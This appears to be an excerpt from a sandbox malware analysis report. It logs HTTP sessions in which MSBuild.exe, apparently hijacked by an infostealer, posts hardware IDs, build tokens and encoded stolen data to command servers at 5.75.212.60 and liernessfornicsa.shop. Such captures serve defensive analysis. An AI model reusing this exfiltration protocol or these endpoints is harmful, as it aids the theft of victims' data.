2024-07-26 16:56:56 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a Data Ascii: eok 8.46.123.33
2024-07-26 16:56:56 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	49766	5.75.212.60	443	7280	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 16:56:56 UTC	325	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----HCAAEBKEGHJKEBFHJDBF User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 Host: 5.75.212.60 Content-Length: 130977 Connection: Keep-Alive Cache-Control: no-cache
2024-07-26 16:56:56 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 48 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 61 36 34 31 64 35 33 64 63 65 63 31 61 62 66 30 63 66 36 62 64 32 66 36 62 63 36 31 37 34 64 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 30 38 33 37 62 31 64 34 35 61 61 37 66 30 65 63 66 32 64 66 35 35 32 61 37 63 61 38 33 32 61 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 46 0d 0a 43 6f 6e 74 Data Ascii: ------HCAAEBKEGHJKEBFHJDBFContent-Disposition: form-data; name="token"5a641d53dcec1abf0cf6bd2f6bc6174d------HCAAEBKEGHJKEBFHJDBFContent-Disposition: form-data; name="build_id"b0837b1d45aa7f0ecf2df552a7ca832a------HCAAEBKEGHJKEBFHJDBFCont
2024-07-26 16:56:56 UTC	16355	OUT	Data Raw: 31 36 78 62 4f 6d 50 66 6b 39 61 38 78 72 32 33 51 62 4c 56 4a 50 67 68 4e 62 78 71 72 33 6c 78 46 4b 4c 53 4d 38 4f 59 53 32 57 55 64 79 53 41 35 41 2b 6c 65 4a 56 76 57 69 6b 6f 74 4c 6f 65 5a 6c 39 53 55 35 56 56 4b 56 37 53 73 46 64 4a 34 61 2f 77 42 52 4d 50 38 41 61 2f 6f 4b 35 75 75 6a 38 4e 66 36 6d 62 2f 65 2f 77 41 4b 39 54 68 2f 2f 66 6c 36 4d 38 50 6a 6a 2f 6b 55 53 39 59 2f 6d 62 75 4b 57 69 69 76 30 41 2f 45 78 4b 4b 4d 55 59 6f 47 65 30 7a 51 70 4d 75 47 34 50 5a 68 31 46 5a 32 43 6b 6a 49 54 6e 61 53 4b 31 43 61 79 6e 50 2b 6b 79 2f 37 35 2f 6e 58 34 7a 57 53 33 50 32 43 42 59 51 31 35 5a 71 2f 2f 49 61 76 2f 77 44 72 34 6b 2f 39 43 4e 65 6f 78 6d 76 4c 74 58 2f 35 44 56 39 2f 31 38 53 66 2b 68 47 76 71 65 44 2f 41 4f 4e 55 39 46 2b 5a 38 Data Ascii: 16xbOmPfk9a8xr23QbLVJPghNbxqr3lxFKLSM8OYS2WUdySA5A+leJVvWikotLoeZl9SU5VVKV7SsFdJ4a/wBRMP8Aa/oK5uuj8Nf6mb/e/wAK9Th//fl6M8Pjj/kUS9Y/mbuKWiiv0A/ExKKMUYoGe0zQpMuG4PZh1FZ2CkjITnaSK1CaynP+ky/75/nX4zWS3P2CBYQ15Zq//Iav/wDr4k/9CNeoxmvLtX/5DV9/18Sf+hGvqeD/AONU9F+Z8
2024-07-26 16:56:56 UTC	16355	OUT	Data Raw: 30 2b 4b 46 72 34 71 75 47 75 56 55 5a 49 39 54 7a 7a 39 65 4f 39 65 58 36 54 70 6d 75 50 71 63 55 65 6c 43 56 4c 78 74 77 6a 61 47 63 52 74 30 4a 50 7a 5a 47 4f 41 61 32 34 50 42 66 6a 71 31 75 35 4c 75 33 74 37 6d 47 35 6b 7a 76 6d 6a 76 6b 56 32 79 63 6e 4a 44 35 4f 54 7a 58 35 2f 4b 6e 4f 6d 2b 57 63 57 6d 66 58 59 57 62 64 4e 38 6b 57 30 2b 71 2f 72 63 71 2f 44 6e 2f 6b 66 64 4d 2f 37 61 2f 38 41 6f 70 36 37 47 79 38 58 51 47 33 76 70 58 38 66 2f 61 45 68 67 44 6c 76 37 47 4b 65 54 6d 52 46 33 59 32 2f 4e 39 37 62 6a 2f 61 7a 32 72 50 38 46 65 43 76 45 4f 6c 2b 4c 72 50 55 4e 51 73 66 4b 67 69 38 77 75 35 6d 52 6a 6b 6f 77 48 41 59 6e 71 61 39 62 6f 67 6e 59 37 38 48 52 6c 37 4b 30 72 72 56 39 31 30 58 6d 6a 67 4c 6e 56 34 64 5a 2b 48 65 70 33 45 47 Data Ascii: 0+KFr4quGuVUZI9Tzz9eO9eX6TpmuPqcUelCVLxtwjaGcRt0JPzZGOAa24PBfjq1u5Lu3t7mG5kzvmjvkV2ycnJD5OTzX5/KnOm+WcWmfXYWbdN8kW0+q/rcq/Dn/kfdM/7a/8Aop67Gy8XQG3vpX8f/aEhgDlv7GKeTmRF3Y2/N97bj/az2rP8FeCvEOl+LrPUNQsfKgi8wu5mRjkowHAYnqa9bognY78HRl7K0rrV910XmjgLnV4dZ+Hep3EG
2024-07-26 16:56:56 UTC	16355	OUT	Data Raw: 68 6d 6b 4f 63 66 78 44 30 46 59 65 31 7a 42 79 62 73 39 66 77 32 2f 46 61 6e 53 36 47 56 63 69 6a 7a 4c 53 32 76 66 65 39 2f 58 2f 41 43 4e 74 4c 6c 42 34 65 69 31 4b 57 30 31 46 59 58 74 37 71 5a 39 51 34 2b 7a 51 74 45 38 69 49 6a 66 4a 79 57 4b 4b 4d 62 67 63 73 4d 44 74 54 46 31 4b 78 6d 6c 68 30 2b 4a 4c 78 62 2b 58 54 45 76 6f 35 57 64 47 69 64 7a 43 4a 53 6d 33 59 43 6f 49 79 41 64 78 35 78 78 57 52 62 43 34 69 73 37 52 76 37 4a 6e 47 70 57 64 76 63 32 38 4d 78 75 76 33 4a 57 5a 70 47 4a 61 50 5a 6b 6b 43 51 6a 37 34 48 41 4a 48 61 6e 76 48 4d 31 71 68 67 30 79 61 48 55 6c 30 39 4c 44 37 52 4a 63 68 34 31 56 59 68 45 58 56 4e 67 49 59 71 44 31 5a 67 4d 6e 6a 4f 43 4d 34 79 7a 43 33 58 2b 72 2f 77 44 41 4e 70 77 79 6d 2b 6e 4c 62 39 4e 50 2b 43 62 Data Ascii: hmkOcfxD0FYe1zBybs9fw2/FanS6GVcijzLS2vfe9/X/ACNtLlB4ei1KW01FYXt7qZ9Q4+zQtE8iIjfJyWKKMbgcsMDtTF1Kxmlh0+JLxb+XTEvo5WdGidzCJSm3YCoIyAdx5xxWRbC4is7Rv7JnGpWdvc28Mxuv3JWZpGJaPZkkCQj74HAJHanvHM1qhg0yaHUl09LD7RJch41VYhEXVNgIYqD1ZgMnjOCM4yzC3X+r/wDANpwym+nLb9NP+Cb
2024-07-26 16:56:56 UTC	16355	OUT	Data Raw: 69 6b 7a 52 6d 6d 4d 57 6b 6f 7a 53 5a 6f 41 57 6a 4e 4e 7a 52 6d 67 64 68 77 2b 38 4b 33 72 72 2f 41 49 2b 44 2f 75 72 2f 41 43 46 63 2b 44 7a 57 72 4c 71 46 76 49 2b 37 63 34 34 48 47 33 32 72 4b 6f 6e 7a 4a 67 74 79 57 6a 4e 56 76 74 74 76 2f 65 66 2f 41 4c 35 70 50 74 73 48 39 35 2f 2b 2b 61 56 6d 57 57 73 30 5a 71 72 39 75 67 39 57 2f 77 43 2b 61 54 37 64 42 36 76 2f 41 4e 38 30 57 59 79 33 6d 6a 4e 56 50 74 30 48 71 2f 35 55 66 62 34 50 56 2f 79 70 32 59 46 72 50 4e 46 56 50 74 38 48 71 2f 35 55 66 62 34 50 56 2f 38 41 76 6d 69 7a 47 57 36 4d 31 55 2b 33 77 65 72 2f 41 4a 55 66 62 34 50 56 2f 77 41 71 4c 4d 43 31 78 52 6d 71 6e 32 2b 44 2f 62 2f 4b 6a 2b 30 59 4d 39 58 2f 41 43 70 32 59 37 46 75 6a 4e 56 50 37 52 74 2f 56 2f 79 6f 2f 74 47 44 2f 62 Data Ascii: ikzRmmMWkozSZoAWjNNzRmgdhw+8K3rr/AI+D/ur/ACFc+DzWrLqFvI+7c44HG32rKonzJgtyWjNVvttv/ef/AL5pPtsH95/++aVmWWs0Zqr9ug9W/wC+aT7dB6v/AN80WYy3mjNVPt0Hq/5Ufb4PV/yp2YFrPNFVPt8Hq/5Ufb4PV/8AvmizGW6M1U+3wer/AJUfb4PV/wAqLMC1xRmqn2+D/b/Kj+0YM9X/ACp2Y7FujNVP7Rt/V/yo/tGD/b
2024-07-26 16:56:56 UTC	16355	OUT	Data Raw: 36 4d 61 6c 47 6f 33 59 2f 35 62 45 2f 37 77 7a 56 53 69 70 63 59 74 37 46 4a 46 33 2b 30 35 6a 39 35 49 6d 2f 34 44 53 2f 32 6a 48 2f 46 62 59 39 31 65 71 47 61 51 6d 6c 37 4f 4a 56 6a 54 46 37 61 74 31 38 78 50 77 7a 54 68 50 62 74 30 6e 48 34 6a 46 5a 4e 46 4c 32 61 48 63 32 51 56 50 33 58 52 76 6f 31 4c 68 76 53 73 54 70 53 68 33 55 2f 4b 37 44 36 47 6c 79 44 75 62 42 79 4f 31 47 61 7a 42 64 7a 72 30 6c 62 38 65 61 65 75 6f 54 66 78 42 47 2b 71 30 75 52 6c 58 4e 41 6d 6b 7a 56 51 61 6a 2f 41 48 6f 66 79 4e 4f 46 39 43 65 71 75 50 31 70 63 72 48 63 73 35 6f 71 45 58 4e 75 66 2b 57 6d 50 71 4b 6b 56 30 66 37 73 69 4e 39 44 52 59 59 32 34 50 2b 68 54 2f 37 6f 2f 6e 56 58 54 76 39 5a 4a 2f 75 2f 77 42 61 74 58 49 50 32 4b 62 36 44 2b 64 56 4e 4f 2b 2f 4c Data Ascii: 6MalGo3Y/5bE/7wzVSipcYt7FJF3+05j95Im/4DS/2jH/FbY91eqGaQml7OJVjTF7at18xPwzThPbt0nH4jFZNFL2aHc2QVP3XRvo1LhvSsTpSh3U/K7D6GlyDubByO1GazBdzr0lb8eaeuoTfxBG+q0uRlXNAmkzVQaj/AHofyNOF9CequP1pcrHcs5oqEXNuf+WmPqKkV0f7siN9DRYY24P+hT/7o/nVXTv9ZJ/u/wBatXIP2Kb6D+dVNO+/L
2024-07-26 16:56:56 UTC	16355	OUT	Data Raw: 52 51 4d 4f 6d 4b 51 30 76 65 6b 50 50 65 6b 4d 4f 74 48 30 6f 2f 44 32 70 76 57 6d 42 36 4c 52 52 52 57 5a 38 6b 46 46 46 46 41 42 52 52 52 51 41 55 55 55 55 41 46 46 46 46 41 42 53 38 55 6c 4c 7a 51 41 55 6c 4c 53 55 41 4c 52 52 53 55 41 4c 78 52 53 55 55 43 46 6f 70 4b 4b 41 46 34 6f 70 4b 4b 51 77 6f 6f 6f 6f 41 4b 4b 4b 4b 41 43 69 69 69 67 41 70 4b 4b 4b 59 42 52 52 52 52 63 41 6f 6f 6f 70 41 46 46 46 46 41 77 70 4b 57 6b 70 67 46 46 46 46 49 41 70 44 53 30 68 70 67 46 46 46 46 41 42 53 55 74 4a 51 41 55 55 55 55 44 43 6b 70 61 53 6d 41 55 55 55 55 41 46 4a 53 6d 6b 6f 47 46 46 46 46 41 43 55 55 55 55 44 51 47 6b 70 54 53 55 41 46 4a 53 30 6c 41 77 6f 6f 6f 6f 41 53 69 6a 76 52 51 4d 54 50 4e 46 42 36 30 55 44 43 69 69 69 67 42 4b 4b 4b 4f 39 41 78 Data Ascii: RQMOmKQ0vekPPekMOtH0o/D2pvWmB6LRRRWZ8kFFFFABRRRQAUUUUAFFFFABS8UlLzQAUlLSUALRRSUALxRSUUCFopKKAF4opKKQwooooAKKKKACiiigApKKKYBRRRRcAooopAFFFFAwpKWkpgFFFFIApDS0hpgFFFFABSUtJQAUUUUDCkpaSmAUUUUAFJSmkoGFFFFACUUUUDQGkpTSUAFJS0lAwooooASijvRQMTPNFB60UDCiiigBKKKO9Ax
2024-07-26 16:56:56 UTC	16355	OUT	Data Raw: 54 42 77 64 33 70 79 63 63 31 6b 35 52 57 37 50 6c 49 77 6c 4c 5a 46 75 30 75 35 37 47 34 57 65 33 6b 4b 53 4c 33 48 63 65 68 39 71 32 74 5a 31 36 50 56 74 46 69 6a 4b 62 4c 6c 5a 67 58 54 73 52 74 62 6b 47 73 52 37 4b 39 6a 6b 69 6a 6b 30 2b 39 56 35 69 52 45 72 57 30 67 4c 6b 44 4a 77 4d 63 38 63 38 55 77 57 31 30 31 36 31 6d 4c 4f 36 4e 30 71 62 7a 41 4c 64 2f 4d 43 2b 75 33 47 63 65 39 63 56 62 44 34 57 74 56 68 57 6b 31 7a 52 32 64 2f 36 30 4f 2b 6a 57 78 6c 47 6c 4f 6a 46 50 6c 6c 75 72 50 2b 72 6a 4b 53 70 6b 74 62 75 57 65 53 33 6a 73 37 70 35 34 78 6c 34 6c 67 63 75 6e 31 58 47 52 55 63 55 63 73 39 77 62 65 47 47 57 53 63 45 67 78 4a 47 7a 4f 43 4f 76 79 67 5a 34 72 73 39 70 44 75 63 58 73 61 6e 38 72 2b 34 62 53 35 6f 6c 56 34 47 6c 57 61 4b 57 Data Ascii: TBwd3pycc1k5RW7PlIwlLZFu0u57G4We3kKSL3Hceh9q2tZ16PVtFijKbLlZgXTsRtbkGsR7K9jkijk0+9V5iRErW0gLkDJwMc8c8UwW10161mLO6N0qbzALd/MC+u3Gce9cVbD4WtVhWk1zR2d/60O+jWxlGlOjFPllurP+rjKSpktbuWeS3js7p54xl4lgcun1XGRUcUcs9wbeGGWScEgxJGzOCOvygZ4rs9pDucXsan8r+4bS5olV4GlWaKW
2024-07-26 16:56:56 UTC	137	OUT	Data Raw: 39 78 31 42 49 50 57 75 57 6f 6f 73 42 30 47 6f 65 4e 2f 45 75 6f 2b 66 48 4a 72 56 37 46 61 7a 4b 59 7a 5a 32 38 37 78 32 36 78 6b 59 38 74 59 77 64 6f 58 48 47 4d 64 4b 35 2b 69 69 6d 41 56 63 6b 2f 35 41 74 72 2f 31 38 54 66 2b 67 78 31 54 71 35 4a 2f 79 42 62 58 2f 72 34 6d 2f 77 44 51 59 36 41 50 2f 39 6b 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 46 2d 2d 0d 0a Data Ascii: 9x1BIPWuWoosB0GoeN/Euo+fHJrV7FazKYzZ287x26xkY8tYwdoXHGMdK5+iimAVck/5Atr/18Tf+gx1Tq5J/yBbX/r4m/wDQY6AP/9k=------HCAAEBKEGHJKEBFHJDBF--
2024-07-26 16:56:58 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Jul 2024 16:56:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-07-26 16:56:58 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	49767	172.67.213.85	443	7916	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 16:56:57 UTC	287	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20432 Host: liernessfornicsa.shop
2024-07-26 16:56:57 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 44 46 42 35 46 32 34 41 32 46 42 38 45 43 37 44 32 46 36 36 44 42 36 41 32 37 43 41 43 32 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"6DFB5F24A2FB8EC7D2F66DB6A27CAC21--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
2024-07-26 16:56:57 UTC	5101	OUT	Data Raw: 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 Data Ascii: `M?lrQMn 64F6(X&7~`aO
2024-07-26 16:56:57 UTC	806	IN	HTTP/1.1 200 OK Date: Fri, 26 Jul 2024 16:56:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=oea1rb0ms0pfjir0ila1f78hcc; expires=Tue, 19-Nov-2024 10:43:36 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ge5uGgcmHhI2il3C8uQZd6Xg4x1lGxan7JwQpv2AhKjnBn624J5mHqLP09JfuNw3%2B0i3DG%2FeYUkqqWYk1E9Ckg3iPD9abP4H1Q2KZsRy%2BTv7IljaveLb1MMtyPIC33BHZx1oAE1XX2E%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a95ed0daf591879-EWR alt-svc: h3=":443"; ma=86400
2024-07-26 16:56:57 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a Data Ascii: eok 8.46.123.33
2024-07-26 16:56:57 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	49768	172.67.213.85	443	7916	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 16:56:58 UTC	286	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1228 Host: liernessfornicsa.shop
2024-07-26 16:56:58 UTC	1228	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 44 46 42 35 46 32 34 41 32 46 42 38 45 43 37 44 32 46 36 36 44 42 36 41 32 37 43 41 43 32 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"6DFB5F24A2FB8EC7D2F66DB6A27CAC21--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
2024-07-26 16:56:59 UTC	814	IN	HTTP/1.1 200 OK Date: Fri, 26 Jul 2024 16:56:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=qurp6uq607gf8bqjhek0kvbga0; expires=Tue, 19-Nov-2024 10:43:37 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F18O29NAQFk1HYs8awagCLYqfRKdoimNHyt7T%2F%2F4sozJepXz%2BNARxQAyzfcScfoRLtgqvJD672QAOahNCLe%2Ba%2FmsovG0xrUuf8EqYSzIR8k%2FbcbAKDbnRE84DCgyXYoVDcm9V1BWbrY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a95ed173b8f6a55-EWR alt-svc: h3=":443"; ma=86400
2024-07-26 16:56:59 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a Data Ascii: eok 8.46.123.33
2024-07-26 16:56:59 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	49769	5.75.212.60	443	7280	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 16:56:58 UTC	322	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----HJDBFBKKJDHJKECBGDAK User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 Host: 5.75.212.60 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-07-26 16:56:58 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 48 4a 44 42 46 42 4b 4b 4a 44 48 4a 4b 45 43 42 47 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 61 36 34 31 64 35 33 64 63 65 63 31 61 62 66 30 63 66 36 62 64 32 66 36 62 63 36 31 37 34 64 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 44 42 46 42 4b 4b 4a 44 48 4a 4b 45 43 42 47 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 30 38 33 37 62 31 64 34 35 61 61 37 66 30 65 63 66 32 64 66 35 35 32 61 37 63 61 38 33 32 61 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 44 42 46 42 4b 4b 4a 44 48 4a 4b 45 43 42 47 44 41 4b 0d 0a 43 6f 6e 74 Data Ascii: ------HJDBFBKKJDHJKECBGDAKContent-Disposition: form-data; name="token"5a641d53dcec1abf0cf6bd2f6bc6174d------HJDBFBKKJDHJKECBGDAKContent-Disposition: form-data; name="build_id"b0837b1d45aa7f0ecf2df552a7ca832a------HJDBFBKKJDHJKECBGDAKCont
2024-07-26 16:56:59 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Jul 2024 16:56:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-07-26 16:56:59 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	49770	172.67.213.85	443	7916	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 16:57:00 UTC	288	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 587838 Host: liernessfornicsa.shop
2024-07-26 16:57:00 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 44 46 42 35 46 32 34 41 32 46 42 38 45 43 37 44 32 46 36 36 44 42 36 41 32 37 43 41 43 32 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"6DFB5F24A2FB8EC7D2F66DB6A27CAC21--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
2024-07-26 16:57:00 UTC	15331	OUT	Data Raw: 18 17 36 a4 5f 4c 3a 7e 6d d5 ac 77 57 e7 b0 2d 32 2a aa 92 b7 4d 66 b9 39 4d 74 eb 15 35 a9 c4 41 7b 9f d0 c5 2c 55 6c 44 45 fc 71 26 f0 3e 08 95 5d aa 99 29 bd c6 8f 1b 18 dc ca 2b 24 3e 86 bd d4 09 03 25 4a 95 08 fa f3 f4 46 43 6d cc d0 91 b3 93 da e1 7f 7d dc 27 6a 83 b9 dd d2 4f 70 e6 7f 5e 78 70 6a cd 7c 46 a6 ab ea 41 b6 3a 9a 3d ad 6e ca 7e ff 3e 15 a2 ef 30 15 b2 a1 af 9a 77 b0 a9 7a a2 1a 94 24 ed 09 29 bc 3b d3 d2 c5 79 26 bf 02 37 c8 df 03 6d 41 d5 d1 bd 09 a7 39 3b 66 0b 4d c2 dc 0f a5 ec c5 4d 33 86 5c dc 7c 94 bb 56 79 43 78 1b ce e7 af af d7 1c a4 9e 67 a7 cf fb c4 08 03 a0 17 41 b5 46 a5 d0 2c 8b c4 e8 3f c5 bb 57 4f fa 2d 7f 09 cf 01 3d c2 be b7 75 9f 80 9e 6a c0 